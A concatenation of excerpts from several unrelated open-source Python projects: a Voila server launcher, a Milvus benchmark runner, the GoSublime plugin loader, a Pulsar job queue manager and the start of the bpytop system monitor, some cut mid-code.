self.log.warning(_("Permission to listen on port %i denied") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical(_('ERROR: the voila server could not be started because '
'no available port could be found.'))
self.exit(1)
if self.open_browser:
self.launch_browser()
self.ioloop = tornado.ioloop.IOLoop.current()
try:
self.ioloop.start()
except KeyboardInterrupt:
self.log.info('Stopping...')
finally:
self.stop()
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
uri = self.base_url
fd, open_file = tempfile.mkstemp(suffix='.html')
# Write a temporary file to open in the browser
with io.open(fd, 'w', encoding='utf-8') as fh:
# TODO: do we want to have the token?
# if self.token:
# url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, uri)
jinja2_env = self.app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url, base_url=url))
def target():
return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
threading.Thread(target=target).start()
main = Voila.launch_instance
|
local_runner.py
|
import os
import logging
import pdb
import time
import random
from multiprocessing import Process
import numpy as np
from client import MilvusClient
import utils
import parser
from runner import Runner
logger = logging.getLogger("milvus_benchmark.local_runner")
class LocalRunner(Runner):
"""run local mode"""
def __init__(self, ip, port):
super(LocalRunner, self).__init__()
self.ip = ip
self.port = port
def run(self, definition, run_type=None):
if run_type == "performance":
for op_type, op_value in definition.items():
run_count = op_value["run_count"]
run_params = op_value["params"]
if op_type == "insert":
for index, param in enumerate(run_params):
table_name = param["table_name"]
# random_1m_100_512
(data_type, table_size, index_file_size, dimension, metric_type) = parser.table_parser(table_name)
milvus = MilvusClient(table_name, ip=self.ip, port=self.port)
# Check has table or not
if milvus.exists_table():
milvus.delete()
time.sleep(10)
milvus.create_table(table_name, dimension, index_file_size, metric_type)
res = self.do_insert(milvus, table_name, data_type, dimension, table_size, param["ni_per"])
logger.info(res)
elif op_type == "query":
for index, param in enumerate(run_params):
logger.info("Definition param: %s" % str(param))
table_name = param["dataset"]
(data_type, table_size, index_file_size, dimension, metric_type) = parser.table_parser(table_name)
milvus = MilvusClient(table_name, ip=self.ip, port=self.port)
# parse index info
index_types = param["index.index_types"]
nlists = param["index.nlists"]
# parse top-k, nq, nprobe
top_ks, nqs, nprobes = parser.search_params_parser(param)
for index_type in index_types:
for nlist in nlists:
milvus.create_index(index_type, nlist)
# preload index
milvus.preload_table()
# Run query test
for nprobe in nprobes:
logger.info("index_type: %s, nlist: %s, metric_type: %s, nprobe: %s" % (index_type, nlist, metric_type, nprobe))
res = self.do_query(milvus, table_name, top_ks, nqs, nprobe, run_count)
headers = [param["dataset"]]
headers.extend([str(top_k) for top_k in top_ks])
utils.print_table(headers, nqs, res)
elif run_type == "stability":
for op_type, op_value in definition.items():
if op_type != "query":
logger.warning("invalid operation: %s in accuracy test, only support query operation" % op_type)
break
run_count = op_value["run_count"]
run_params = op_value["params"]
nq = 10000
for index, param in enumerate(run_params):
logger.info("Definition param: %s" % str(param))
table_name = param["dataset"]
(data_type, table_size, index_file_size, dimension, metric_type) = parser.table_parser(table_name)
# set default test time
if "during_time" not in param:
during_time = 100 # seconds
else:
during_time = int(param["during_time"]) * 60
# set default query process num
if "query_process_num" not in param:
query_process_num = 10
else:
query_process_num = int(param["query_process_num"])
milvus = MilvusClient(table_name)
# Check has table or not
if not milvus.exists_table():
logger.warning("Table %s not existed, continue exec next params ..." % table_name)
continue
start_time = time.time()
insert_vectors = [[random.random() for _ in range(dimension)] for _ in range(nq)]
while time.time() < start_time + during_time:
processes = []
# # do query
# for i in range(query_process_num):
# milvus_instance = MilvusClient(table_name)
# top_k = random.choice([x for x in range(1, 100)])
# nq = random.choice([x for x in range(1, 1000)])
# nprobe = random.choice([x for x in range(1, 500)])
# logger.info(nprobe)
# p = Process(target=self.do_query, args=(milvus_instance, table_name, [top_k], [nq], 64, run_count, ))
# processes.append(p)
# p.start()
# time.sleep(0.1)
# for p in processes:
# p.join()
milvus_instance = MilvusClient(table_name)
top_ks = random.sample([x for x in range(1, 100)], 4)
nqs = random.sample([x for x in range(1, 1000)], 3)
nprobe = random.choice([x for x in range(1, 500)])
res = self.do_query(milvus, table_name, top_ks, nqs, nprobe, run_count)
# milvus_instance = MilvusClient(table_name)
status, res = milvus_instance.insert(insert_vectors, ids=[x for x in range(len(insert_vectors))])
if not status.OK():
logger.error(status.message)
if (time.time() - start_time) % 300 == 0:
status = milvus_instance.drop_index()
if not status.OK():
logger.error(status.message)
index_type = random.choice(["flat", "ivf_flat", "ivf_sq8"])
status = milvus_instance.create_index(index_type, 16384)
if not status.OK():
logger.error(status.message)
|
GoSublime.py
|
import os
import sublime
import sublime_plugin
import sys
import traceback
st2 = (sys.version_info[0] == 2)
dist_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, dist_dir)
ANN = ''
VERSION = ''
MARGO_EXE = ''
fn = os.path.join(dist_dir, 'gosubl', 'about.py')
execErr = ''
try:
with open(fn) as f:
code = compile(f.read(), fn, 'exec')
exec(code)
except Exception:
execErr = "Error: failed to exec about.py: Exception: %s" % traceback.format_exc()
print("GoSublime: %s" % execErr)
def loadable_mods():
from .gosubl import gs
from .gosubl import sh
from .gosubl import margo
from .gosubl import mg9
return [
('gs', gs),
('sh', sh),
('margo', margo),
('mg9', mg9),
]
def plugin_loaded():
from threading import Thread
Thread(target=_plugin_loaded_async).start()
def _plugin_loaded_async():
from .gosubl import about
from .gosubl import sh
from .gosubl import ev
from .gosubl import gs
if VERSION != about.VERSION:
gs.show_output('GoSublime-main', '\n'.join([
'GoSublime has been updated.',
'New version: `%s`, current version: `%s`' % (VERSION, about.VERSION),
'Please restart Sublime Text to complete the update.',
execErr,
]))
return
if gs.attr('about.version'):
gs.show_output('GoSublime-main', '\n'.join([
'GoSublime appears to have been updated.',
'New ANNOUNCE: `%s`, current ANNOUNCE: `%s`' % (ANN, about.ANN),
'You may need to restart Sublime Text.',
]))
return
gs.set_attr('about.version', VERSION)
gs.set_attr('about.ann', ANN)
for mod_name, mod in loadable_mods():
print('GoSublime %s: %s.init()' % (VERSION, mod_name))
try:
mod.gs_init({
'version': VERSION,
'ann': ANN,
'margo_exe': MARGO_EXE,
})
except AttributeError:
pass
except TypeError:
# old versions didn't take an arg
mod.gs_init()
ev.init.post_add = lambda e, f: f()
ev.init()
def cb():
aso = gs.aso()
old_version = aso.get('version', '')
old_ann = aso.get('ann', '')
if about.VERSION > old_version or about.ANN > old_ann:
aso.set('version', about.VERSION)
aso.set('ann', about.ANN)
gs.save_aso()
gs.focus(gs.dist_path('CHANGELOG.md'))
sublime.set_timeout(cb, 0)
def plugin_unloaded():
for mod_name, mod in loadable_mods():
try:
fini = mod.gs_fini
except AttributeError:
continue
print('GoSublime %s: %s.fini()' % (VERSION, mod_name))
fini({
})
class GosublimeDoesntSupportSublimeText2(sublime_plugin.TextCommand):
def run(self, edit):
msg = '\n'.join([
'Sublime Text 2 is no longer supported by GoSublime'+
'',
'See https://github.com/DisposaBoy/GoSublime/blob/master/SUPPORT.md#sublime-text',
'',
'If you have a *good* reason to not upgrade to Sublime Text 3,',
'discuss it here https://github.com/DisposaBoy/GoSublime/issues/689',
'',
])
self.view.set_scratch(True)
self.view.set_syntax_file(gs.tm_path('9o'))
self.view.set_name('GoSublime no longer supports Sublime Text 2')
self.view.insert(edit, 0, msg)
self.view.set_read_only(True)
if st2:
def cb():
view = sublime.active_window().new_file()
view.run_command('gosublime_doesnt_support_sublime_text2')
sublime.set_timeout(cb, 1000)
|
queued.py
|
import os
import multiprocessing
from six.moves import queue
import threading
import traceback
from pulsar.managers.unqueued import Manager
from logging import getLogger
log = getLogger(__name__)
STOP_SIGNAL = object()
RUN = object()
# Number of concurrent jobs used by default for
# QueueManager.
DEFAULT_NUM_CONCURRENT_JOBS = 1
JOB_FILE_COMMAND_LINE = "command_line"
class QueueManager(Manager):
"""
A job manager that queues up jobs directly (i.e. does not use an
external queuing software such PBS, SGE, etc...).
"""
manager_type = "queued_python"
def __init__(self, name, app, **kwds):
super(QueueManager, self).__init__(name, app, **kwds)
num_concurrent_jobs = kwds.get('num_concurrent_jobs', DEFAULT_NUM_CONCURRENT_JOBS)
if num_concurrent_jobs == '*':
num_concurrent_jobs = multiprocessing.cpu_count()
else:
num_concurrent_jobs = int(num_concurrent_jobs)
self._init_worker_threads(num_concurrent_jobs)
def _init_worker_threads(self, num_concurrent_jobs):
self.work_queue = queue.Queue()
self.work_threads = []
for i in range(num_concurrent_jobs):
worker = threading.Thread(target=self.run_next)
worker.daemon = True
worker.start()
self.work_threads.append(worker)
def launch(self, job_id, command_line, submit_params={}, dependencies_description=None, env=[], setup_params=None):
command_line = self._prepare_run(
job_id,
command_line,
dependencies_description=dependencies_description,
env=env,
setup_params=setup_params
)
try:
self._job_directory(job_id).store_metadata(JOB_FILE_COMMAND_LINE, command_line)
except Exception:
log.info("Failed to persist command line for job %s, will not be able to recover." % job_id)
self.work_queue.put((RUN, (job_id, command_line)))
def _recover_active_job(self, job_id):
command_line = self._job_directory(job_id).load_metadata(JOB_FILE_COMMAND_LINE, None)
if command_line:
self.work_queue.put((RUN, (job_id, command_line)))
else:
raise Exception("Cannot recover job with id %s" % job_id)
def shutdown(self, timeout=None):
for i in range(len(self.work_threads)):
self.work_queue.put((STOP_SIGNAL, None))
for worker in self.work_threads:
worker.join(timeout)
if worker.isAlive():
log.warn("Failed to stop worker thread [%s]" % worker)
def run_next(self):
"""
Run the next item in the queue (a job waiting to run).
"""
while 1:
(op, obj) = self.work_queue.get()
if op is STOP_SIGNAL:
return
try:
(job_id, command_line) = obj
try:
os.remove(self._job_file(job_id, JOB_FILE_COMMAND_LINE))
except Exception:
log.exception("Running command but failed to delete - command may rerun on Pulsar boot.")
# _run will not do anything if job has been cancelled.
self._run(job_id, command_line, async=False)
except Exception:
log.warn("Uncaught exception running job with job_id %s" % job_id)
traceback.print_exc()
|
bpytop.py
|
#!/usr/bin/env python3
# pylint: disable=not-callable, no-member, unsubscriptable-object
# indent = tab
# tab-size = 4
# Copyright 2020 Aristocratos (jakob@qvantnet.com)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys, io, threading, signal, re, subprocess, logging, logging.handlers, argparse
import urllib.request
from time import time, sleep, strftime, localtime
from datetime import timedelta
from _thread import interrupt_main
from collections import defaultdict
from select import select
from distutils.util import strtobool
from string import Template
from math import ceil, floor
from random import randint
from shutil import which
from typing import List, Set, Dict, Tuple, Optional, Union, Any, Callable, ContextManager, Iterable, Type, NamedTuple
errors: List[str] = []
try: import fcntl, termios, tty, pwd
except Exception as e: errors.append(f'{e}')
try: import psutil # type: ignore
except Exception as e: errors.append(f'{e}')
SELF_START = time()
SYSTEM: str
if "linux" in sys.platform: SYSTEM = "Linux"
elif "bsd" in sys.platform: SYSTEM = "BSD"
elif "darwin" in sys.platform: SYSTEM = "MacOS"
else: SYSTEM = "Other"
if errors:
print("ERROR!")
print("\n".join(errors))
if SYSTEM == "Other":
print("\nUnsupported platform!\n")
else:
print("\nInstall required modules!\n")
raise SystemExit(1)
VERSION: str = "1.0.61"
#? Argument parser ------------------------------------------------------------------------------->
args = argparse.ArgumentParser()
args.add_argument("-b", "--boxes", action="store", dest="boxes", help = "which boxes to show at start, example: -b \"cpu mem net proc\"")
args.add_argument("-lc", "--low-color", action="store_true", help = "disable truecolor, converts 24-bit colors to 256-color")
args.add_argument("-v", "--version", action="store_true", help = "show version info and exit")
args.add_argument("--debug", action="store_true", help = "start with loglevel set to DEBUG overriding value set in config")
stdargs = args.parse_args()
if stdargs.version:
print(f'bpytop version: {VERSION}\n'
f'psutil version: {".".join(str(x) for x in psutil.version_info)}')
raise SystemExit(0)
ARG_BOXES: str = stdargs.boxes
LOW_COLOR: bool = stdargs.low_color
DEBUG: bool = stdargs.debug
#? Variables ------------------------------------------------------------------------------------->
BANNER_SRC: List[Tuple[str, str, str]] = [
("#ffa50a", "#0fd7ff", "██████╗ ██████╗ ██╗ ██╗████████╗ ██████╗ ██████╗"),
("#f09800", "#00bfe6", "██╔══██╗██╔══██╗╚██╗ ██╔╝╚══██╔══╝██╔═══██╗██╔══██╗"),
("#db8b00", "#00a6c7", "██████╔╝██████╔╝ ╚████╔╝ ██║ ██║ ██║██████╔╝"),
("#c27b00", "#008ca8", "██╔══██╗██╔═══╝ ╚██╔╝ ██║ ██║ ██║██╔═══╝ "),
("#a86b00", "#006e85", "██████╔╝██║ ██║ ██║ ╚██████╔╝██║"),
("#000000", "#000000", "╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝"),
]
#*?This is the template used to create the config file
DEFAULT_CONF: Template = Template(f'#? Config file for bpytop v. {VERSION}' + '''
#* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme.
#* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai"
color_theme="$color_theme"
#* If the theme set background should be shown, set to False if you want terminal background transparency
theme_background=$theme_background
#* Sets if 24-bit truecolor should be used, will convert 24-bit colors to 256 color (6x6x6 color cube) if false.
truecolor=$truecolor
#* Manually set which boxes to show. Available values are "cpu mem net proc", seperate values with whitespace.
shown_boxes="$shown_boxes"
#* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs.
update_ms=$update_ms
#* Processes update multiplier, sets how often the process list is updated as a multiplier of "update_ms".
#* Set to 2 or higher to greatly decrease bpytop cpu usage. (Only integers)
proc_update_mult=$proc_update_mult
#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive",
#* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly.
proc_sorting="$proc_sorting"
#* Reverse sorting order, True or False.
proc_reversed=$proc_reversed
#* Show processes as a tree
proc_tree=$proc_tree
#* Which depth the tree view should auto collapse processes at
tree_depth=$tree_depth
#* Use the cpu graph colors in the process list.
proc_colors=$proc_colors
#* Use a darkening gradient in the process list.
proc_gradient=$proc_gradient
#* If process cpu usage should be of the core it's running on or usage of the total available cpu power.
proc_per_core=$proc_per_core
#* Show process memory as bytes instead of percent
proc_mem_bytes=$proc_mem_bytes
#* Sets the CPU stat shown in upper half of the CPU graph, "total" is always available, see:
#* https://psutil.readthedocs.io/en/latest/#psutil.cpu_times for attributes available on specific platforms.
#* Select from a list of detected attributes from the options menu
cpu_graph_upper="$cpu_graph_upper"
#* Sets the CPU stat shown in lower half of the CPU graph, "total" is always available, see:
#* https://psutil.readthedocs.io/en/latest/#psutil.cpu_times for attributes available on specific platforms.
#* Select from a list of detected attributes from the options menu
cpu_graph_lower="$cpu_graph_lower"
#* Toggles if the lower CPU graph should be inverted.
cpu_invert_lower=$cpu_invert_lower
#* Set to True to completely disable the lower CPU graph.
cpu_single_graph=$cpu_single_graph
#* Shows the system uptime in the CPU box.
show_uptime=$show_uptime
#* Check cpu temperature, needs "osx-cpu-temp" on MacOS X.
check_temp=$check_temp
#* Which sensor to use for cpu temperature, use options menu to select from list of available sensors.
cpu_sensor=$cpu_sensor
#* Show temperatures for cpu cores also if check_temp is True and sensors has been found
show_coretemp=$show_coretemp
#* Draw a clock at top of screen, formatting according to strftime, empty string to disable.
draw_clock="$draw_clock"
#* Update main ui in background when menus are showing, set this to false if the menus is flickering too much for comfort.
background_update=$background_update
#* Custom cpu model name, empty string to disable.
custom_cpu_name="$custom_cpu_name"
#* Optional filter for shown disks, should be full path of a mountpoint, separate multiple values with a comma ",".
#* Begin line with "exclude=" to change to exclude filter, oterwise defaults to "most include" filter. Example: disks_filter="exclude=/boot, /home/user"
disks_filter="$disks_filter"
#* Show graphs instead of meters for memory values.
mem_graphs=$mem_graphs
#* If swap memory should be shown in memory box.
show_swap=$show_swap
#* Show swap as a disk, ignores show_swap value above, inserts itself after first disk.
swap_disk=$swap_disk
#* If mem box should be split to also show disks info.
show_disks=$show_disks
#* Filter out non physical disks. Set this to False to include network disks, RAM disks and similar.
only_physical=$only_physical
#* Read disks list from /etc/fstab. This also disables only_physical.
use_fstab=$use_fstab
#* Toggles if io stats should be shown in regular disk usage view
show_io_stat=$show_io_stat
#* Toggles io mode for disks, showing only big graphs for disk read/write speeds.
io_mode=$io_mode
#* Set to True to show combined read/write io graphs in io mode.
io_graph_combined=$io_graph_combined
#* Set the top speed for the io graphs in MiB/s (10 by default), use format "device:speed" seperate disks with a comma ",".
#* Example: "/dev/sda:100, /dev/sdb:20"
io_graph_speeds="$io_graph_speeds"
#* Set fixed values for network graphs, default "10M" = 10 Mibibytes, possible units "K", "M", "G", append with "bit" for bits instead of bytes, i.e "100mbit"
net_download="$net_download"
net_upload="$net_upload"
#* Start in network graphs auto rescaling mode, ignores any values set above and rescales down to 10 Kibibytes at the lowest.
net_auto=$net_auto
#* Sync the scaling for download and upload to whichever currently has the highest scale
net_sync=$net_sync
#* If the network graphs color gradient should scale to bandwith usage or auto scale, bandwith usage is based on "net_download" and "net_upload" values
net_color_fixed=$net_color_fixed
#* Starts with the Network Interface specified here.
net_iface="$net_iface"
#* Show battery stats in top right if battery is present
show_battery=$show_battery
#* Show init screen at startup, the init screen is purely cosmetical
show_init=$show_init
#* Enable check for new version from github.com/aristocratos/bpytop at start.
update_check=$update_check
#* Set loglevel for "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG".
#* The level set includes all lower levels, i.e. "DEBUG" will show all logging info.
log_level=$log_level
''')
CONFIG_DIR: str = f'{os.path.expanduser("~")}/.config/bpytop'
if not os.path.isdir(CONFIG_DIR):
try:
os.makedirs(CONFIG_DIR)
os.mkdir(f'{CONFIG_DIR}/themes')
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
CONFIG_FILE: str = f'{CONFIG_DIR}/bpytop.conf'
THEME_DIR: str = ""
if os.path.isdir(f'{os.path.dirname(__file__)}/bpytop-themes'):
THEME_DIR = f'{os.path.dirname(__file__)}/bpytop-themes'
else:
for td in ["/usr/local/", "/usr/", "/snap/bpytop/current/usr/"]:
if os.path.isdir(f'{td}share/bpytop/themes'):
THEME_DIR = f'{td}share/bpytop/themes'
break
USER_THEME_DIR: str = f'{CONFIG_DIR}/themes'
CORES: int = psutil.cpu_count(logical=False) or 1
THREADS: int = psutil.cpu_count(logical=True) or 1
THREAD_ERROR: int = 0
DEFAULT_THEME: Dict[str, str] = {
"main_bg" : "#00",
"main_fg" : "#cc",
"title" : "#ee",
"hi_fg" : "#969696",
"selected_bg" : "#7e2626",
"selected_fg" : "#ee",
"inactive_fg" : "#40",
"graph_text" : "#60",
"meter_bg" : "#40",
"proc_misc" : "#0de756",
"cpu_box" : "#3d7b46",
"mem_box" : "#8a882e",
"net_box" : "#423ba5",
"proc_box" : "#923535",
"div_line" : "#30",
"temp_start" : "#4897d4",
"temp_mid" : "#5474e8",
"temp_end" : "#ff40b6",
"cpu_start" : "#50f095",
"cpu_mid" : "#f2e266",
"cpu_end" : "#fa1e1e",
"free_start" : "#223014",
"free_mid" : "#b5e685",
"free_end" : "#dcff85",
"cached_start" : "#0b1a29",
"cached_mid" : "#74e6fc",
"cached_end" : "#26c5ff",
"available_start" : "#292107",
"available_mid" : "#ffd77a",
"available_end" : "#ffb814",
"used_start" : "#3b1f1c",
"used_mid" : "#d9626d",
"used_end" : "#ff4769",
"download_start" : "#231a63",
"download_mid" : "#4f43a3",
"download_end" : "#b0a9de",
"upload_start" : "#510554",
"upload_mid" : "#7d4180",
"upload_end" : "#dcafde",
"process_start" : "#80d0a3",
"process_mid" : "#dcd179",
"process_end" : "#d45454",
}
MENUS: Dict[str, Dict[str, Tuple[str, ...]]] = {
"options" : {
"normal" : (
"┌─┐┌─┐┌┬┐┬┌─┐┌┐┌┌─┐",
"│ │├─┘ │ ││ ││││└─┐",
"└─┘┴ ┴ ┴└─┘┘└┘└─┘"),
"selected" : (
"╔═╗╔═╗╔╦╗╦╔═╗╔╗╔╔═╗",
"║ ║╠═╝ ║ ║║ ║║║║╚═╗",
"╚═╝╩ ╩ ╩╚═╝╝╚╝╚═╝") },
"help" : {
"normal" : (
"┬ ┬┌─┐┬ ┌─┐",
"├─┤├┤ │ ├─┘",
"┴ ┴└─┘┴─┘┴ "),
"selected" : (
"╦ ╦╔═╗╦ ╔═╗",
"╠═╣║╣ ║ ╠═╝",
"╩ ╩╚═╝╩═╝╩ ") },
"quit" : {
"normal" : (
"┌─┐ ┬ ┬ ┬┌┬┐",
"│─┼┐│ │ │ │ ",
"└─┘└└─┘ ┴ ┴ "),
"selected" : (
"╔═╗ ╦ ╦ ╦╔╦╗ ",
"║═╬╗║ ║ ║ ║ ",
"╚═╝╚╚═╝ ╩ ╩ ") }
}
MENU_COLORS: Dict[str, Tuple[str, ...]] = {
"normal" : ("#0fd7ff", "#00bfe6", "#00a6c7", "#008ca8"),
"selected" : ("#ffa50a", "#f09800", "#db8b00", "#c27b00")
}
#? Units for floating_humanizer function
UNITS: Dict[str, Tuple[str, ...]] = {
"bit" : ("bit", "Kib", "Mib", "Gib", "Tib", "Pib", "Eib", "Zib", "Yib", "Bib", "GEb"),
"byte" : ("Byte", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB", "BiB", "GEB")
}
SUBSCRIPT: Tuple[str, ...] = ("₀", "₁", "₂", "₃", "₄", "₅", "₆", "₇", "₈", "₉")
SUPERSCRIPT: Tuple[str, ...] = ("⁰", "¹", "²", "³", "⁴", "⁵", "⁶", "⁷", "⁸", "⁹")
#? Setup error logger ---------------------------------------------------------------->
try:
errlog = logging.getLogger("ErrorLogger")
errlog.setLevel(logging.DEBUG)
eh = logging.handlers.RotatingFileHandler(f'{CONFIG_DIR}/error.log', maxBytes=1048576, backupCount=4)
eh.setLevel(logging.DEBUG)
eh.setFormatter(logging.Formatter("%(asctime)s | %(levelname)s: %(message)s", datefmt="%d/%m/%y (%X)"))
errlog.addHandler(eh)
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
#? Timers for testing and debugging -------------------------------------------------------------->
class TimeIt:
timers: Dict[str, float] = {}
paused: Dict[str, float] = {}
@classmethod
def start(cls, name):
cls.timers[name] = time()
@classmethod
def pause(cls, name):
if name in cls.timers:
cls.paused[name] = time() - cls.timers[name]
del cls.timers[name]
@classmethod
def stop(cls, name):
if name in cls.timers:
total: float = time() - cls.timers[name]
del cls.timers[name]
if name in cls.paused:
total += cls.paused[name]
del cls.paused[name]
errlog.debug(f'{name} completed in {total:.6f} seconds')
def timeit_decorator(func):
def timed(*args, **kw):
ts = time()
out = func(*args, **kw)
errlog.debug(f'{func.__name__} completed in {time() - ts:.6f} seconds')
return out
return timed
#? Set up config class and load config ----------------------------------------------------------->
class Config:
'''Holds all config variables and functions for loading from and saving to disk'''
keys: List[str] = ["color_theme", "update_ms", "proc_sorting", "proc_reversed", "proc_tree", "check_temp", "draw_clock", "background_update", "custom_cpu_name",
"proc_colors", "proc_gradient", "proc_per_core", "proc_mem_bytes", "disks_filter", "update_check", "log_level", "mem_graphs", "show_swap",
"swap_disk", "show_disks", "use_fstab", "net_download", "net_upload", "net_auto", "net_color_fixed", "show_init", "theme_background",
"net_sync", "show_battery", "tree_depth", "cpu_sensor", "show_coretemp", "proc_update_mult", "shown_boxes", "net_iface", "only_physical",
"truecolor", "io_mode", "io_graph_combined", "io_graph_speeds", "show_io_stat", "cpu_graph_upper", "cpu_graph_lower", "cpu_invert_lower",
"cpu_single_graph", "show_uptime"]
conf_dict: Dict[str, Union[str, int, bool]] = {}
color_theme: str = "Default"
theme_background: bool = True
truecolor: bool = True
shown_boxes: str = "cpu mem net proc"
update_ms: int = 2000
proc_update_mult: int = 2
proc_sorting: str = "cpu lazy"
proc_reversed: bool = False
proc_tree: bool = False
tree_depth: int = 3
proc_colors: bool = True
proc_gradient: bool = True
proc_per_core: bool = False
proc_mem_bytes: bool = True
cpu_graph_upper: str = "total"
cpu_graph_lower: str = "total"
cpu_invert_lower: bool = True
cpu_single_graph: bool = False
show_uptime: bool = True
check_temp: bool = True
cpu_sensor: str = "Auto"
show_coretemp: bool = True
draw_clock: str = "%X"
background_update: bool = True
custom_cpu_name: str = ""
disks_filter: str = ""
update_check: bool = True
mem_graphs: bool = True
show_swap: bool = True
swap_disk: bool = True
show_disks: bool = True
only_physical: bool = True
use_fstab: bool = False
show_io_stat: bool = True
io_mode: bool = False
io_graph_combined: bool = False
io_graph_speeds: str = ""
net_download: str = "10M"
net_upload: str = "10M"
net_color_fixed: bool = False
net_auto: bool = True
net_sync: bool = False
net_iface: str = ""
show_battery: bool = True
show_init: bool = True
log_level: str = "WARNING"
warnings: List[str] = []
info: List[str] = []
sorting_options: List[str] = ["pid", "program", "arguments", "threads", "user", "memory", "cpu lazy", "cpu responsive"]
log_levels: List[str] = ["ERROR", "WARNING", "INFO", "DEBUG"]
cpu_percent_fields: List = ["total"]
cpu_percent_fields.extend(getattr(psutil.cpu_times_percent(), "_fields", []))
cpu_sensors: List[str] = [ "Auto" ]
if hasattr(psutil, "sensors_temperatures"):
try:
_temps = psutil.sensors_temperatures()
if _temps:
for _name, _entries in _temps.items():
for _num, _entry in enumerate(_entries, 1):
if hasattr(_entry, "current"):
cpu_sensors.append(f'{_name}:{_num if _entry.label == "" else _entry.label}')
except:
pass
changed: bool = False
recreate: bool = False
config_file: str = ""
_initialized: bool = False
def __init__(self, path: str):
self.config_file = path
conf: Dict[str, Union[str, int, bool]] = self.load_config()
if not "version" in conf.keys():
self.recreate = True
self.info.append(f'Config file malformatted or missing, will be recreated on exit!')
elif conf["version"] != VERSION:
self.recreate = True
self.info.append(f'Config file version and bpytop version missmatch, will be recreated on exit!')
for key in self.keys:
if key in conf.keys() and conf[key] != "_error_":
setattr(self, key, conf[key])
else:
self.recreate = True
self.conf_dict[key] = getattr(self, key)
self._initialized = True
def __setattr__(self, name, value):
if self._initialized:
object.__setattr__(self, "changed", True)
object.__setattr__(self, name, value)
if name not in ["_initialized", "recreate", "changed"]:
self.conf_dict[name] = value
def load_config(self) -> Dict[str, Union[str, int, bool]]:
'''Load config from file, set correct types for values and return a dict'''
new_config: Dict[str,Union[str, int, bool]] = {}
conf_file: str = ""
if os.path.isfile(self.config_file):
conf_file = self.config_file
elif os.path.isfile("/etc/bpytop.conf"):
conf_file = "/etc/bpytop.conf"
else:
return new_config
try:
with open(conf_file, "r") as f:
for line in f:
line = line.strip()
if line.startswith("#? Config"):
new_config["version"] = line[line.find("v. ") + 3:]
continue
if not '=' in line:
continue
key, line = line.split('=', maxsplit=1)
if not key in self.keys:
continue
line = line.strip('"')
if type(getattr(self, key)) == int:
try:
new_config[key] = int(line)
except ValueError:
self.warnings.append(f'Config key "{key}" should be an integer!')
if type(getattr(self, key)) == bool:
try:
new_config[key] = bool(strtobool(line))
except ValueError:
self.warnings.append(f'Config key "{key}" can only be True or False!')
if type(getattr(self, key)) == str:
new_config[key] = str(line)
except Exception as e:
errlog.exception(str(e))
if "proc_sorting" in new_config and not new_config["proc_sorting"] in self.sorting_options:
new_config["proc_sorting"] = "_error_"
self.warnings.append(f'Config key "proc_sorted" didn\'t get an acceptable value!')
if "log_level" in new_config and not new_config["log_level"] in self.log_levels:
new_config["log_level"] = "_error_"
self.warnings.append(f'Config key "log_level" didn\'t get an acceptable value!')
if "update_ms" in new_config and int(new_config["update_ms"]) < 100:
new_config["update_ms"] = 100
self.warnings.append(f'Config key "update_ms" can\'t be lower than 100!')
for net_name in ["net_download", "net_upload"]:
if net_name in new_config and not new_config[net_name][0].isdigit(): # type: ignore
new_config[net_name] = "_error_"
if "cpu_sensor" in new_config and not new_config["cpu_sensor"] in self.cpu_sensors:
new_config["cpu_sensor"] = "_error_"
self.warnings.append(f'Config key "cpu_sensor" does not contain an available sensor!')
if "shown_boxes" in new_config and not new_config["shown_boxes"] == "":
for box in new_config["shown_boxes"].split(): #type: ignore
if not box in ["cpu", "mem", "net", "proc"]:
new_config["shown_boxes"] = "_error_"
self.warnings.append(f'Config key "shown_boxes" contains invalid box names!')
break
for cpu_graph in ["cpu_graph_upper", "cpu_graph_lower"]:
if cpu_graph in new_config and not new_config[cpu_graph] in self.cpu_percent_fields:
new_config[cpu_graph] = "_error_"
self.warnings.append(f'Config key "{cpu_graph}" does not contain an available cpu stat attribute!')
return new_config
def save_config(self):
'''Save current config to config file if difference in values or version, creates a new file if not found'''
if not self.changed and not self.recreate: return
try:
with open(self.config_file, "w" if os.path.isfile(self.config_file) else "x") as f:
f.write(DEFAULT_CONF.substitute(self.conf_dict))
except Exception as e:
errlog.exception(str(e))
try:
CONFIG: Config = Config(CONFIG_FILE)
if DEBUG:
errlog.setLevel(logging.DEBUG)
else:
errlog.setLevel(getattr(logging, CONFIG.log_level))
DEBUG = CONFIG.log_level == "DEBUG"
errlog.info(f'New instance of bpytop version {VERSION} started with pid {os.getpid()}')
errlog.info(f'Loglevel set to {"DEBUG" if DEBUG else CONFIG.log_level}')
errlog.debug(f'Using psutil version {".".join(str(x) for x in psutil.version_info)}')
errlog.debug(f'CMD: {" ".join(sys.argv)}')
if CONFIG.info:
for info in CONFIG.info:
errlog.info(info)
CONFIG.info = []
if CONFIG.warnings:
for warning in CONFIG.warnings:
errlog.warning(warning)
CONFIG.warnings = []
